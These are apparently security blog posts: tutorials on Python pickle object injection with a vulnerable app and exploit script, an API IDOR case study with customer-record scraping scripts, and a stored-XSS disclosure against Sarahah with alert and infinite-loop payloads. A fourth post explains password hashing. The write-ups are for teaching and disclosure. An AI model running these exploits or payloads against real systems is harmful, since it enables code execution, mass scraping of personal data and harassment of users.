Defencely Clarifies Python Object Injection Exploitation

 

Readers,

Welcome to the Defencely Blog. This is Rony, a Red Teaming Operations Associate at Defencely Cloud Security Pvt. Ltd., and we are delighted to present exploitation scenarios from recently conducted security operations for prestigious organizations in India and for global enterprises.

Today at Defencely Lab we are going to explain and demonstrate the Python Object Injection attack in minute detail. The whole demonstration uses an intentionally vulnerable application and exploit that we wrote, which you can find at this link –  Github – Python Object Injection

Contents – 

  • Introduction to Python Classes and Objects.
  • What is an Object Injection?
  • Detecting an Object Injection Attack.
  • Understanding the workflow of a Vulnerable Application.
  • Coding our own exploit against the intended Vulnerable Application.

Prerequisite – 

  • A basic understanding of OOP concepts.

Introduction to Python Classes and Objects.

 

What are Classes?

A class is basically a template in which you store your variables and methods.

What are Objects?

An object can be many things: an instance of a class, a variable, or a function defined in a class.

 

Let's go into a practical example:

Here we create an instance of the class named Test, assign it to a variable named simpleapp, and pass the value of the variable rony to the instance.

Output –

simpleapp = Test(rony)

When this code is executed, Python creates an object and passes our value to the first parameter. Whenever Python creates an object, the __init__ method is invoked; __init__ works like a constructor in Python.

The seemingly random text printed with our output appears because we directly print the variable holding the instance, to show that Python treats it as an object.
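Since the original screenshots are not reproduced here, the following is a minimal sketch of the kind of example being described, assuming a class named Test that takes a single constructor argument:

class Test:
    def __init__(self, name):
        # __init__ acts like a constructor: it runs as soon as the object is created
        self.name = name
        print("Hello " + name)


rony = "Rony"
simpleapp = Test(rony)   # Python creates a Test object and passes our value to __init__
print(simpleapp)         # prints something like <__main__.Test object at 0x7f...>,
                         # which is the "random" output showing simpleapp is an object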

What is an Object Injection?

Object Injection is an application-level security vulnerability that can allow an attacker to perform critical attacks, depending on the context.

Python specifically has a native module named "pickle" which is vulnerable to Object Injection in particular scenarios.

The official Python documentation already flags pickle as a risky module when user-controlled data is passed to it.

We can compare the pickle module with PHP's native serialize()/unserialize() functions, which are likewise vulnerable to Object Injection when user input is supplied.

Unlike PHP, Python does not require magic methods as a precondition for injecting into objects.

In Python, serializing and deserializing are simply called pickling and unpickling of data.

Unpickling data is NOT necessarily dangerous in Python, unless user-supplied data is passed to the unpickling process.

This is what pickled and unpickled data look like in Python –
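The screenshot is not reproduced here; as a stand-in, here is a quick sketch of pickling and unpickling a simple value (the exact serialized bytes vary with the Python version and pickle protocol):

import pickle

data = {'name': 'rony', 'role': 'red team'}

pickled = pickle.dumps(data)       # serialize: produces an opaque string of bytes
print(pickled)                     # e.g. something like "(dp0\nS'name'\n..." with protocol 0

unpickled = pickle.loads(pickled)  # deserialize: rebuilds the original object
print(unpickled)                   # {'name': 'rony', 'role': 'red team'}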

 

Detecting an Object Injection Attack 

To achieve an Object Injection, you generally need a white-box pentest of the application, because whenever you pickle complex objects, the serialized data in Python carries the name of the class along with the variables and their values.
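For example, pickling an instance of a custom class leaves the module name, class name and attribute names visible inside the serialized data (shown here with protocol 0; exact bytes vary by Python version), which is why white-box access makes such payloads much easier to recognise and forge:

import pickle


class UserProfile:
    def __init__(self, username):
        self.username = username


blob = pickle.dumps(UserProfile('rony'), protocol=0)
print(blob)
# The output contains the strings '__main__', 'UserProfile' and 'username':
# the class name and attribute names travel inside the pickled data.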

The Pickle module offers us four methods for easy and fast pickling/Unpickling.

  • dump()
  • dumps()
  • load()
  • loads()

You can find details of how each of them behaves in Python's official documentation.
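As a quick illustration of the difference, dump() and load() work on file objects (the variant used by the vulnerable application below), while dumps() and loads() work on in-memory data:

import pickle

record = ['task1', 'task2']

with open('data.pkl', 'wb') as f:
    pickle.dump(record, f)         # dump(): pickle straight into a file

with open('data.pkl', 'rb') as f:
    print(pickle.load(f))          # load(): unpickle from a file -> ['task1', 'task2']

blob = pickle.dumps(record)        # dumps(): pickle to an in-memory string of bytes
print(pickle.loads(blob))          # loads(): unpickle from that string -> ['task1', 'task2']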

As already mentioned, unpickling data is NOT necessarily dangerous, but if you handle user input and the backend pickles and unpickles that user-supplied data, that is where the risk comes in. To quote the old rule – "Never trust user input".

If the supplied data is user-controlled, it can obviously be tampered with.

So, if you see pickled data passing through any HTTP method, there is a possibility of Object Injection.

 

Understanding the workflow of a Vulnerable Application

Filename: pickle.py
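The application itself appears in the original post only as a screenshot, so here is a minimal reconstruction sketch based on the names used in this write-up (simpleApp, secureApp(), final_workout(), workDone, arg). The sketch is saved under a different filename, because a script literally named pickle.py would shadow the standard pickle module it needs to import:

# vulnerable_app.py -- reconstruction sketch of the intentionally vulnerable application
import os
import pickle
import sys


class simpleApp:

    def secureApp(self, filename):
        # The flaw: unpickle whatever is inside the user-supplied file
        with open(filename, 'rb') as f:
            workDone = pickle.load(f)
        self.final_workout(workDone)

    def final_workout(self, workDone):
        # Write the unpickled data into code.py and run it
        with open('code.py', 'w') as f:
            f.write(str(workDone))
        os.system('python code.py')


if __name__ == '__main__':
    arg = sys.argv[1]        # user input: path to a file containing pickled data
    app = simpleApp()
    app.secureApp(arg)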

We will study the code above and then craft input for it accordingly to achieve an object injection.

Ignore everything else in the code above; let's concentrate on three things.

  • The user input, which in this case is the arg variable.
  • The final_workout() method inside the simpleApp class, which interestingly runs a Python file.
  • The call to app.secureApp(), which unpickles the supplied data.

Now let's dive deeper and understand the roles these methods play.

The secureApp() method in the simpleApp() class

I am assuming that by now you have read the official Python documentation linked above and know the ins and outs of the methods used in this post.

Methods

  1. dump()
  2. dumps()
  3. load()
  4. loads()

The secureApp() method takes a filename as an argument, unpickles the data from that file using the load() method of the pickle module, and assigns the unpickled value to the variable workDone, which is later passed as an argument to the final_workout() method.

Let's see what is inside the final_workout() method.

The final_workout() method in the simpleApp() class –

This method creates a Python file named code.py, writes the unpickled data into it, and runs it. Simple, right?

Let's see what it looks like when we run our main vulnerable application, pickle.py, with already generated serialized data.

As we can see, it reads the content from the serialized data, runs it successfully, and prints out the string.

Next, we will craft our own serialized data to perform a successful object injection against the same application.

 

 

Coding our own Exploit

We now know that pickle.py works with serialized data, so to craft our own serialized payload we will use the dumps() method to pickle it.

And here is our final exploit that produces our own serialized payload data, which you can also find at the shared Github link.

Filename: exploit_pickle.py
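The exploit, too, appears in the original post only as a screenshot; a minimal sketch of what exploit_pickle.py could look like follows, assuming the payload is simply a string of Python source code that the vulnerable final_workout() method will later write into code.py and execute:

# exploit_pickle.py -- reconstruction sketch: craft a malicious pickled payload
import pickle

# The payload is plain Python source; the vulnerable application writes the
# unpickled value into code.py and runs it, so any command placed here runs
# on the target.
payload = "import os\nos.system('id')"

with open('serialized_payload', 'wb') as f:
    f.write(pickle.dumps(payload))

print("Payload written to 'serialized_payload' -- pass this file to the vulnerable application")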

 

We serialize a piece of code that includes system commands using the exploit we just wrote, and then test whether it works.

And we are now able to successfully inject our own crafted code.

I hope this provides real insight into vulnerabilities that stay well hidden in heaps of enterprise code, and we hope to continue providing excellent security services, with absolute integrity, to businesses and enterprises of all kinds.

This is Rony Das from Defencely Cloud Security Pvt. Ltd.; join us next week on the Defencely Blog for more highlights of how our Defencely Lab exploitation work pushes past all kinds of security walls.

Thank you & have an excellent day ahead.

 

Defencely Red Team Was Able to Compromise Half a Million Indian E-commerce Records!? How?

Welcome to the Defencely Blog. This is Rony, a Red Teaming Operations Associate at Defencely Cloud Security Pvt. Ltd., and we are delighted to present exploitation scenarios from recently conducted security operations for prestigious organizations in India and abroad. This is the same scenario we faced while doing a security inspection of an extremely high-profile target, and it is likely to repeat for most other organizations.

We are excluding the name of the actual target and will demonstrate the issue on a demo application that has been intentionally coded to reproduce the exact same scenario, reflecting the gravest mistakes developers keep making. It is part and parcel of our job to make Indian e-commerce aware of the risks surrounding it, and of how compliance cannot be met while such risk factors remain – risks that, if not resolved immediately, leave companies liable and answerable to their investors.

You can find the demo application which will be used for the demonstration on this Github Repository.

Let’s get started,

Contents – 

  • WorkFlow
  • Technical Understanding
  • Exploiting

WorkFlow – 

Basically, our target had an Android application that was highly susceptible to insecure API practices. Most Android applications that deal with large amounts of customer data use APIs (Application Programming Interfaces) to make their tasks easier, and this makes it much easier to tamper with things when API calls are made without any authentication service – or, even where authentication is present, when there are other risks in the authentication mechanism itself. That's where our ops team started enumerating.

An attacker needs to be well versed in the programming languages used to build GUI desktop, iOS, or Android applications, and to know the ins and outs of event listeners and handlers. These detect your touches and clicks, collect data according to the invoked functions, send it via APIs, and receive the output the same way.

In our particular scenario there was a list of menus used for different tasks. Our ops team started clicking through all of them and ended up at a menu named "Profile". While intercepting the requests, our testers came across a URL requested by the application, and that is exactly where the target started getting interesting.

To help our readers understand this better, let's jump into the technical details.

Technical Details

Note: further explanation and demonstration will be done using the coded example application. These details provide the fine-grained understanding that is needed here.

The URL looked similar to the one below at the time the application was tested for security violations:

api01.example.com/api/rest/v1/?customerId=89892381

Defencely Red Team ops opened the URL in our customized browser and looked at the rendered output, which surprised us:

The URL returned results in JSON format, exposing the kind of credentials one can see in the screenshot above. Please remember, this is a sample coded application and not the real details. The rendered output contained every customer's profile details, which are extremely sensitive in nature, such as their email, phone number, first name, and last name. These details could later be used for social engineering and more targeted attacks on a particular customer.

The most basic flaw was that the API took input directly, without any validation in place or any authorization mechanism, which should have been there in the first place. Our Red Team ops concluded that this could be an instance of "unauthorized API service calls", which maps to Insecure Direct Object References on the OWASP Top 10 chart.

What if an attacker could enumerate all the customer IDs and then write a purpose-built script to obtain all of those records, given that the parameter was vulnerable to insecure direct object references through these API service calls? We replaced the integer values to determine whether such changes were rendered as we hoped – and voila!

At this point our Red Team associates and security professionals were clear that there was no authorization service in place; without it, nothing validated whether such service request calls should be allowed, leaving the door open to an insecure direct object reference attack.

This meant the API identified its users by a single unique key, in this case "customer_Id". That is a very real problem in enterprises: there was no mapping that enforced authorization for such an API call. We are sure many large-scale enterprises are equally open to such attacks, and their reputation hangs in the balance after a compliance investigation – assuming the compliance team is aggressive enough to routinely check for the damage a single unclosed vulnerability might cost.

Defencely was able to code a script to determine the exact number of registered users; this script can be found at Simple Python Script to guess the range.
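Since the linked script is not reproduced here, the following is a rough sketch of how such a range-guessing script could work, assuming the demo endpoint from this post and that a non-existent customerId returns an empty or error response:

# guess_range.py -- sketch: estimate how many customer ids exist
import requests

BASE = "http://api01.example.com/api/rest/v1/"


def customer_exists(customer_id):
    r = requests.get(BASE, params={"customerId": customer_id})
    return r.status_code == 200 and r.text.strip() not in ("", "null", "[]")


# Grow an upper bound, then binary-search for the highest valid id.
low, high = 1, 1
while customer_exists(high):
    low, high = high, high * 2

while low + 1 < high:
    mid = (low + high) // 2
    if customer_exists(mid):
        low = mid
    else:
        high = mid

print("Approximate number of registered customers:", low)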

Now let’s simplify the exploitation process.

Exploitation

Defencely created another Python script as a proof of concept for the company, simplifying the attack in order to demonstrate the gravity of the concern to senior managers and the management team, who quickly reacted and closed the threat uncovered by the Red Team operations.
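The proof-of-concept script itself is only shown as a screenshot in the original post; a minimal sketch of the idea follows, assuming the same demo endpoint and illustrative JSON field names (email, firstName, lastName, phone):

# poc_dump.py -- sketch: walk the customerId range and collect profile details
import requests

BASE = "http://api01.example.com/api/rest/v1/"

for customer_id in range(1, 101):            # small demo range only
    r = requests.get(BASE, params={"customerId": customer_id})
    if r.status_code != 200 or not r.text.strip():
        continue
    record = r.json()
    print(customer_id,
          record.get("email"),
          record.get("firstName"),
          record.get("lastName"),
          record.get("phone"))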

 

Extracting users' credentials – remember that these same credentials could be harvested and tried against their social media accounts, since most of the time a victim reuses the same credentials:

 

That's all we have for now. Look forward to more from the Defencely Red Team Operations Labs next week, with yet another story of how we add value for our customer base through our insider threat program as well as routine, offensive vulnerability assessments followed by penetration tests of critical applications at both the staging and production level. Our manual security assessment methods have proved to deliver the best value. Feel free to get in touch with Shritam Bhowmick, Red Team Lead @Defencely, at shritam@defencely.com for any security-operations-related queries, or say "Hi" to us at hi@defencely.com for inquiries.

We will see you again next week with another operational tale from the broader security landscape, where 0-days are always a possibility and where security compliance is a decision Indian e-commerce management and stakeholders will have to make sooner or later.

Let’s act pro-actively.

Achieving Code Injection on Trendy – Sarahah.com

Hello Readers,

Welcome to Defencely. I'm Rony, part of the red teaming operations at Defencely Cloud Security Pvt. Ltd., and we conduct security operations for prestigious organizations in India and abroad. We would like to raise security concerns related to a trending application named 'Sarahah', and I hope our readers will enjoy this detailed security inspection of the application and learn from the developers' mistakes.

We have kept the content specific and simple to understand for our readers, as we believe continuous, conscious security efforts are necessary to help developers fix their security loopholes in a timely manner. Defencely has already reported the code injection concern to the developers with a proper timeline, as per its full disclosure policy.

We are still awaiting a fix, and the disclosure deadline has since expired. In order to help users, we are proceeding with full disclosure.

Contents – 

  • Application Overview.
  • The Workflow.
  • Exploiting the Trend.

Application Overview –

What is Sarahah?

Sarahah is an application that lets you get anonymous feedback from your friends and coworkers. At least, that's what Sarahah says, and it plans to extend the features.

How does it work?

First of all, Sarahah lets you register on its website; once that is done, it gives you a personal dashboard and a link carrying your name, which you can share on social networks to receive anonymous feedback.

As a penetration tester, before attempting any exploitation against the target, one needs to enumerate thoroughly in order to produce a quality assessment. So here comes a technical understanding of the application.

The WorkFlow –

Everything starts after we sign up for Sarahah.com. Let’s understand the WorkFlow from the point of view of a Penetration Tester. 

As a penetration tester, one needs to know that user input can take you from zero to a successful security audit real quick.

That's where we started fuzzing the user inputs, which in this case come from your friends and co-workers sending you anonymous feedback – something that would not be possible if the application did not accept input from its audience.

  1. You create an account.
  2. Your friends send you feedback through a publicly available form.
  3. The feedback is displayed in your dashboard.
  4. This means the feedback is saved to the database and later echoed back to your dashboard.

What if Sarahah is not sanitizing the user input? Can we initiate code injection?

Exploiting the Trend –

We sent a simple and classic snippet of JavaScript code to our own dashboard.

Payload:  <script>alert("Hello, Vulnerable!");</script>
[Screenshot: Sarahah1]

 

This JavaScript code should pop up an alert box in the user's dashboard. Let's check whether we got a popup.
[Screenshot: Sarahah 2]

Nope, we didn't get any popup. The code we tried injecting into the application is simply echoed back to the dashboard as text rather than being executed.

So what we did is enumerate around the application, and we noticed an AJAX request going to the server that fetches the next batch of content in JSON format and parses it back into the dashboard – which means we have our second attack surface.

One can see our payload in the JSON returned by this request:
[Screenshot: JSON req]

But there's a twist. The event fires every time you scroll down, and then an AJAX request is made to the URL

https://sarahah.com/Messages/GetReceivedMessagePage?page=1

and the contents of the JSON result are then parsed and echoed back into the dashboard.

The Sarahah developers messed up when parsing the contents of the JSON result: at that point they no longer filter special characters.

So how are we going to trigger the XSS?

  1. The first thing to keep in mind is that you need to make the user scroll down so that the AJAX request is made.
  2. Send the payload to the user.
  3. Then flood the user's dashboard with some random messages (approximately 20-30). This is how you make the user scroll down to see the messages, among which your payload is included.
  4. Once the user scrolls down, the AJAX request is made, all the contents of the next page are parsed (including your XSS payload), and Sarahah echoes them back to the dashboard.

And your XSS is triggered immediately –
[Screenshot: XSSpop]

This pop-up ("Hello, You got hacked") will keep appearing in the user's dashboard until the user deletes that particular piece of feedback.

Here an attacker can easily harass users just by changing the payload to something like this –

Payload:

<script>
while(1){
    alert("You are getting hacked!")
}
</script>

This is an infinite loop, because 1 is always true, so the popups never stop. We recommend that the Sarahah developers fix this behaviour, and we have already attempted to send them the cure for the itch.

Do you rely on Hashing? Know WebSec Cryptography In-Depth!

Credits: Thomas Pornin

For storing password hashes, you need an algorithm slow enough that brute-force attacks are not feasible. Salting the password will help against rainbow-table attacks, but not against brute-force attacks. You need to use an algorithm specifically designed for this purpose, such as the functions discussed below (PBKDF2, bcrypt, scrypt).

scrypt is new but interesting because it not only uses a variable work factor but also memory-hard functions. This dramatically increases the cost of brute-force attacks, because both running-time and memory requirements are increased.

The Theory

We need to hash passwords as a second line of defence. A server which can authenticate users necessarily contains, somewhere in its entrails, some data which can be used to validate a password. A very simple system would just store the passwords themselves, and validation would be a simple comparison. But if a hostile outsider were to gain a simple glimpse at the contents of the file or database table which contains the passwords, then that attacker would learn a lot. Unfortunately, such partial, read-only breaches do occur in practice (a mislaid backup tape, a decommissioned but not wiped-out hard disk, an aftermath of a SQL injection attack — the possibilities are numerous). See this blog post for a detailed discussion.

Since the overall contents of a server that can validate passwords are necessarily sufficient to indeed validate passwords, an attacker who obtained a read-only snapshot of the server is in position to make an offline dictionary attack: he tries potential passwords until a match is found. This is unavoidable. So we want to make that kind of attack as hard as possible. Our tools are the following:

  • Cryptographic hash functions: these are fascinating mathematical objects which everybody can compute efficiently, and yet nobody knows how to invert them. This looks good for our problem – the server could store a hash of a password; when presented with a putative password, the server just has to hash it to see if it gets the same value; and yet, knowing the hash does not reveal the password itself.
  • Salts: among the advantages of the attacker over the defender is parallelism. The attacker usually grabs a whole list of hashed passwords, and is interested in breaking as many of them as possible. He may try to attack several in parallel. For instance, the attacker may consider one potential password, hash it, and then compare the value with 100 hashed passwords; this means that the attacker shares the cost of hashing over several attacked passwords. A similar optimisation is precomputed tables, including rainbow tables; this is still parallelism, with a space-time change of coordinates. The common characteristic of all attacks which use parallelism is that they work over several passwords which were processed with the exact same hash function. Salting is about using not one hash function, but a lot of distinct hash functions; ideally, each instance of password hashing should use its own hash function. A salt is a way to select a specific hash function among a big family of hash functions. Properly applied salts will completely thwart parallel attacks (including rainbow tables).
  • Slowness: computers become faster over time (Gordon Moore, co-founder of Intel, theorized it in his famous law). Human brains do not. This means that attackers can “try” more and more potential passwords as years pass, while users cannot remember more and more complex passwords (or flatly refuse to). To counter that trend, we can make hashing inherently slow by defining the hash function to use a lot of internal iterations (thousands, possibly millions).

We have a few standard cryptographic hash functions; the most famous are MD5 and the SHA family. Building a secure hash function out of elementary operations is far from easy. When cryptographers want to do that, they think hard, then harder, and organize a tournament where the functions fight each other fiercely. When hundreds of cryptographers gnawed and scraped and punched at a function for several years and found nothing bad to say about it, then they begin to admit that maybe that specific function could be considered as more or less secure. This is just what happened in the SHA-3 competition. We have to use this way of designing hash functions because we know no better way. Mathematically, we do not know if secure hash functions actually exist; we just have “candidates” (that’s the difference between “it cannot be broken” and “nobody in the world knows how to break it”).

A basic hash function, even if secure as a hash function, is not appropriate for password hashing, because:

  • it is unsalted, allowing for parallel attacks (rainbow tables for MD5 or SHA-1 can be obtained for free, you do not even need to recompute them yourself);
  • it is way too fast, and gets faster with technological advances. With a recent GPU (i.e. off-the-shelf consumer product which everybody can buy), hashing rate is counted in billions of passwords per second.

So we need something better. It so happens that slapping together a hash function and a salt, and iterating it, is not easier to do than designing a hash function — at least, if you want the result to be secure. There again, you have to rely on standard constructions which have survived the continuous onslaught of vindicative cryptographers.

Good Password Hashing Functions

PBKDF2

PBKDF2 comes from PKCS#5. It is parameterized with an iteration count (an integer, at least 1, no upper limit), a salt (an arbitrary sequence of bytes, no constraint on length), a required output length (PBKDF2 can generate an output of configurable length), and an “underlying PRF”. In practice, PBKDF2 is always used with HMAC, which is itself a construction built over an underlying hash function. So when we say “PBKDF2 with SHA-1”, we actually mean “PBKDF2 with HMAC with SHA-1”.
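As a concrete illustration, Python's standard library exposes this construction as hashlib.pbkdf2_hmac(); a minimal sketch of hashing and verifying a password with it (the parameter choices here are illustrative, not a recommendation):

import hashlib
import hmac
import os


def hash_password(password, iterations=200000):
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac('sha256', password.encode('utf-8'), salt, iterations)
    return salt, iterations, dk


def verify_password(password, salt, iterations, expected):
    dk = hashlib.pbkdf2_hmac('sha256', password.encode('utf-8'), salt, iterations)
    return hmac.compare_digest(dk, expected)    # constant-time comparison


salt, iterations, dk = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, iterations, dk))   # True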

Advantages of PBKDF2:

  • Has been specified for a long time, seems unscathed for now.
  • Is already implemented in various frameworks (e.g. it is provided with .NET).
  • Highly configurable (although some implementations do not let you choose the hash function, e.g. the one in .NET is for SHA-1 only).
  • Received NIST blessings (modulo the difference between hashing and key derivation; see later on).
  • Configurable output length (again, see later on).

Drawbacks of PBKDF2:

  • CPU-intensive only, thus amenable to high optimization with GPU (the defender is a basic server which does generic things, i.e. a PC, but the attacker can spend his budget on more specialized hardware, which will give him an edge).
  • You still have to manage the parameters yourself (salt generation and storage, iteration count encoding…). There is a standard encoding for PBKDF2 parameters but it uses ASN.1 so most people will avoid it if they can (ASN.1 can be tricky to handle for the non-expert).

bcrypt

bcrypt was designed by reusing and expanding elements of a block cipher called Blowfish. The iteration count is a power of two, which is a tad less configurable than PBKDF2, but sufficiently so nevertheless. This is the core password hashing mechanism in the OpenBSD operating system.
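For illustration, the widely used Python bcrypt package (assumed installed separately) wraps this in two calls; the encoded output already carries the salt and the cost factor:

import bcrypt

password = b"correct horse battery staple"

hashed = bcrypt.hashpw(password, bcrypt.gensalt(rounds=12))   # cost factor 12 = 2**12 iterations
print(hashed)            # e.g. b"$2b$12$..." -- salt and cost are embedded in the string

# Verification reads the salt and cost back out of the stored string itself
print(bcrypt.checkpw(password, hashed))   # True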

Advantages of bcrypt:

  • Many available implementations in various languages (see the links at the end of the Wikipedia page).
  • More resilient to GPU; this is due to details of its internal design. The bcrypt authors made it so voluntarily: they reused Blowfish because Blowfish was based on an internal RAM table which is constantly accessed and modified throughout the processing. This makes life much harder for whoever wants to speed up bcrypt with a GPU (GPU are not good at making a lot of memory accesses in parallel).
  • Standard output encoding which includes the salt, the iteration count and the output as one simple to store character string of printable characters.

Drawbacks of bcrypt:

  • Output size is fixed: 192 bits.
  • While bcrypt is good at thwarting GPU, it can still be thoroughly optimized with FPGA: modern FPGA chips have a lot of small embedded RAM blocks which are very convenient for running many bcrypt implementations in parallel within one chip. It has been done.
  • Input password size is limited to 51 characters. In order to handle longer passwords, one has to combine bcrypt with a hash function (you hash the password and then use the hash value as the “password” for bcrypt). Combining cryptographic primitives is known to be dangerous (see above) so such games cannot be recommended on a general basis.

scrypt

scrypt is a much newer construction (designed in 2009) which builds over PBKDF2 and a stream cipher called Salsa20/8, but these are just tools around the core strength of scrypt, which is RAM. scrypt has been designed to inherently use a lot of RAM (it generates some pseudo-random bytes, then repeatedly reads them in a pseudo-random sequence). “Lots of RAM” is something which is hard to make parallel. A basic PC is good at RAM access, and will not try to read dozens of unrelated RAM bytes simultaneously. An attacker with a GPU or a FPGA will want to do that, and will find it difficult.
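Python 3.6+ exposes scrypt through hashlib when built against a recent OpenSSL; a minimal sketch, with cost parameters chosen purely for illustration:

import hashlib
import os

password = b"correct horse battery staple"
salt = os.urandom(16)

# n = CPU/memory cost (a power of two), r = block size, p = parallelisation.
# Memory use is roughly 128 * r * n bytes -- about 16 MiB with these values.
key = hashlib.scrypt(password, salt=salt, n=2**14, r=8, p=1, dklen=64)
print(key.hex())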

Advantages of scrypt:

  • A PC, i.e. exactly what the defender will use when hashing passwords, is the most efficient platform (or close enough) for computing scrypt. The attacker no longer gets a boost by spending his dollars on GPU or FPGA.
  • One more way to tune the function: memory size.

Drawbacks of scrypt:

  • Still new (my own rule of thumb is to wait at least 5 years of general exposure, so no scrypt for production until 2014 – but, of course, it is best if other people try scrypt in production, because this gives extra exposure).
  • Not as many available, ready-to-use implementations for various languages.
  • Unclear whether the CPU / RAM mix is optimal. For each of the pseudo-random RAM accesses, scrypt still computes a hash function. A cache miss will be about 200 clock cycles, one SHA-256 invocation is close to 1000. There may be room for improvement here.
  • Yet another parameter to configure: memory size.

OpenPGP Iterated And Salted S2K

I cite this one because you will use it if you do password-based file encryption with GnuPG. That tool follows the OpenPGP format which defines its own password hashing functions, called “Simple S2K”, “Salted S2K” and “Iterated and Salted S2K“. Only the third one can be deemed “good” in the context of this answer. It is defined as the hash of a very long string (configurable, up to about 65 megabytes) consisting of the repetition of an 8-byte salt and the password.

As far as these things go, OpenPGP’s Iterated And Salted S2K is decent; it can be considered as similar to PBKDF2, with less configurability. You will very rarely encounter it outside of OpenPGP, as a stand-alone function.

Unix “crypt”

Recent Unix-like systems (e.g. Linux), for validating user passwords, use iterated and salted variants of the crypt() function based on good hash functions, with thousands of iterations. This is reasonably good. Some systems can also use bcrypt, which is better.

The old crypt() function, based on the DES block cipher, is not good enough:

  • It is slow in software but fast in hardware, and can be made fast in software too but only when computing several instances in parallel (technique known as SWAR or “bitslicing”). Thus, the attacker is at an advantage.
  • It is still quite fast, with only 25 iterations.
  • It has a 12-bit salt, which means that salt reuse will occur quite often.
  • It truncates passwords to 8 characters (characters beyond the eighth are ignored) and it also drops the upper bit of each character (so you are more or less stuck with ASCII).

But the more recent variants, which are active by default, will be fine.

Bad Password Hashing Functions

About everything else, in particular virtually every homemade method that people relentlessly invent.

For some reason, many developers insist on designing functions themselves, and seem to assume that “secure cryptographic design” means “throw together every kind of cryptographic or non-cryptographic operation that can be thought of”. See this question for an example. The underlying principle seems to be that the sheer complexity of the resulting utterly tangled mess of instructions will befuddle attackers. In practice, though, the developer himself will be more confused by his own creation than the attacker.

Complexity is bad. Homemade is bad. New is bad. If you remember that, you’ll avoid 99% of problems related to password hashing, or cryptography, or even security in general.

Password hashing in Windows operating systems used to be mindbogglingly awful and now is just terrible (unsalted, non-iterated MD4).

Key Derivation

Up to now, we considered the question of hashing passwords. A close problem is about transforming a password into a symmetric key which can be used for encryption; this is called key derivation and is the first thing you do when you “encrypt a file with a password”.

It is possible to make contrived examples of password hashing functions which are secure for the purpose of storing a password validation token, but terrible when it comes to generating symmetric keys; and the converse is equally possible. But these examples are very “artificial”. For practical functions like the one described above:

  • The output of a password hashing function is acceptable as a symmetric key, after possible truncation to the required size.
  • A Key Derivation Function can serve as a password hashing function as long as the “derived key” is long enough to avoid “generic preimages” (the attacker is just lucky and finds a password which yields the same output). An output of more than 100 bits or so will be enough.

Indeed, PBKDF2 and scrypt are KDF, not password hashing function — and NIST “approves” of PBKDF2 as a KDF, not explicitly as a password hasher (but it is possible, with only a very minute amount of hypocrisy, to read NIST’s prose in such a way that it seems to say that PBKDF2 is good for hashing passwords).

Conversely, bcrypt is really a block cipher (the bulk of the password processing is the “key schedule”) which is then used in CTR mode to produce three blocks (i.e. 192 bits) of pseudo-random output, making it a kind of hash function. bcrypt can be turned into a KDF with a little surgery, by using the block cipher in CTR mode for more blocks. But, as usual, we cannot recommend such homemade transforms. Fortunately, 192 bits are already more than enough for most purposes (e.g. symmetric encryption with GCM or EAX only needs a 128-bit key).

Miscellaneous Topics

How many iterations?

As many as possible! This salted-and-slow hashing is an arms race between the attacker and the defender. You use many iterations to make the hashing of a password harder for everybody. To improve security, you should set that number as high as you can tolerate on your server, given the tasks that your server must otherwise fulfill. Higher is better.
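One practical way to choose the count is to measure it on the actual server and raise it until a single hash takes as long as you can afford; a rough calibration sketch (the 100 ms target is illustrative):

import hashlib
import os
import time


def pbkdf2_seconds(iterations):
    start = time.perf_counter()
    hashlib.pbkdf2_hmac('sha256', b'benchmark-password', os.urandom(16), iterations)
    return time.perf_counter() - start


iterations = 10000
while pbkdf2_seconds(iterations) < 0.1:    # aim for roughly 100 ms per hash on this machine
    iterations *= 2

print("Chosen iteration count:", iterations)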

Collisions and MD5

MD5 is broken: it is computationally easy to find a lot of pairs of distinct inputs which hash to the same value. These are called collisions.

However, collisions are not an issue for password hashing. Password hashing requires the hash function to be resistant to preimages, not to collisions. Collisions are about finding pairs of messages which give the same output without restriction, whereas in password hashing the attacker must find a message which yields a given output that the attacker does not get to choose. This is quite different. As far as we know, MD5 is still (almost) as strong as it has ever been with regards to preimages (there is a theoretical attack which is still very far in the “ludicrously impossible to run in practice” zone).

The real problem with MD5 as it is commonly used in password hashing is that it is very fast, and unsalted. However, PBKDF2 used with MD5 would be robust. You should still use SHA-1 or SHA-256 with PBKDF2, but for Public Relations. People get nervous when they hear “MD5”.

Salt Generation

The main and only point of the salt is to be as unique as possible. Whenever a salt value is reused anywhere, this has the potential to help the attacker.

For instance, if you use the user name as salt, then an attacker (or several colluding attackers) could find it worthwhile to build rainbow tables which attack the password hashing function when the salt is “admin” (or “root” or “joe”), because there will be several, possibly many sites around the world which will have a user named “admin”. Similarly, when a user changes his password, he usually keeps his name, leading to salt reuse. Old passwords are valuable targets, because users have the habit of reusing passwords in several places (that’s known to be a bad idea, and advertised as such, but they will do it nonetheless because it makes their life easier), and also because people tend to generate their passwords “in sequence”: if you learn that Bob’s old password is “SuperSecretPassword37”, then Bob’s current password is probably “SuperSecretPassword38” or “SuperSecretPassword39”.

The cheap way to obtain uniqueness is to use randomness. If you generate your salt as a sequence of random bytes from the cryptographically secure PRNG that your operating system offers (/dev/urandom, CryptGenRandom()…) then you will get salt values which will be “unique with a sufficiently high probability”. 16 bytes are enough so that you will never see a salt collision in your life, which is overkill but simple enough.
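In Python this amounts to a one-liner; a minimal sketch generating a 16-byte salt from the OS CSPRNG and storing it alongside the hash and iteration count:

import hashlib
import os

password = b"hunter2"
salt = os.urandom(16)          # unique per password, from the OS CSPRNG
iterations = 200000
dk = hashlib.pbkdf2_hmac('sha256', password, salt, iterations)

# Store salt, iteration count and hash together; the salt does not need to be secret.
stored = "%s$%d$%s" % (salt.hex(), iterations, dk.hex())
print(stored)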

UUIDs are a standard way of generating “unique” values. Note that “version 4” UUIDs just use randomness (122 random bits), as explained above. A lot of programming frameworks offer simple-to-use functions to generate UUIDs on demand, and they can be used as salts.

Salt Secrecy

Salts are not meant to be secret; otherwise we would call them keys. You do not need to make salts public, but if you have to make them public (e.g. to support client-side hashing), then don’t worry too much about it. Salts are there for uniqueness. Strictly speaking, the salt is nothing more than the selection of a specific hash function within a big family of functions.

“Pepper”

Cryptographers can never let a metaphor alone; they must extend it with further analogies and bad puns. “Peppering” is about using a secret salt, i.e. a key. If you use a “pepper” in your password hashing function, then you are switching to a quite different kind of cryptographic algorithm; namely, you are computing a Message Authentication Code over the password. The MAC key is your “pepper”.

